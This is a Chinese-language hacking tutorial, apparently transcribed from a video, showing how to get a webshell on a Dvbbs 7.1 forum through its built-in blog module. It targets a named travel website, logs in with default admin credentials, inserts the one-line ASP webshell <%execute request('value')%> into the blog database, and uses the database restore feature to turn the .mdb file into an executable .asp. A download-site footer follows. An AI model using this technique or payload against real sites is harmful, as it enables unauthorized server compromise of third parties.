点击获取更多： 利用,博客,获得,Dbbs7.1,Webshell 相关下载

　

今天讲的是 DVBBS7。1   利用 就是博客 获得WEBSHELL的一种方法

来看看这个网站 http://www.5195abc.com 一个和旅游有关的网站

有个论坛是 Powered By Dvbbs Version 7.1.0 Sp1 的  我们来看看

这个论坛管理员的帐号后台和前台都是一样的默认密码 admin admin888

好我们先进去 进入后台了

到这里有很多获得WEBSHELL的方法 我们这次用Dvbbs7。1自带的的BOKE来得到webshell

我已经激活了一个博客了

先在里面添加链接的版面

再在其中插入一句话木马到数据库 ：<<%execute request("value")%>

下面通过博客数据库恢复来把.mdb转化为.asp的文件  BOKE数据库一般是boke/data/dvboke.mdb

好，我们看看行不行

有点慢 成功了 这些乱码就是数据库代码
Microsoft VBScript 运行时错误 错误 '800a000d'

类型不匹配: 'Execute'

/bbs/boke/data/dvboke.asp，行 843

说明我们的木马代码运行了 木马已经再数据库中了 下面我们写入木马

 

* 注意:下载本站软件请使用迅雷软件下载，速度更快、更稳定。 本站统一解压密码为:www.05112.org
* 如果是下载黑客相关软件，请注意自行杀毒！
* 如果您发现该软件不能下载，请通知管理员，谢谢！
* 未经本站明确许可，任何网站不得非法盗链及抄袭本站资源；如引用页面，请注明来自本站，谢谢您的支持！
* 本站软件均收集于网络，如有侵犯您的产权请及时联系我们，我们会在得到反映的24小时内删除这些下载及相应信息！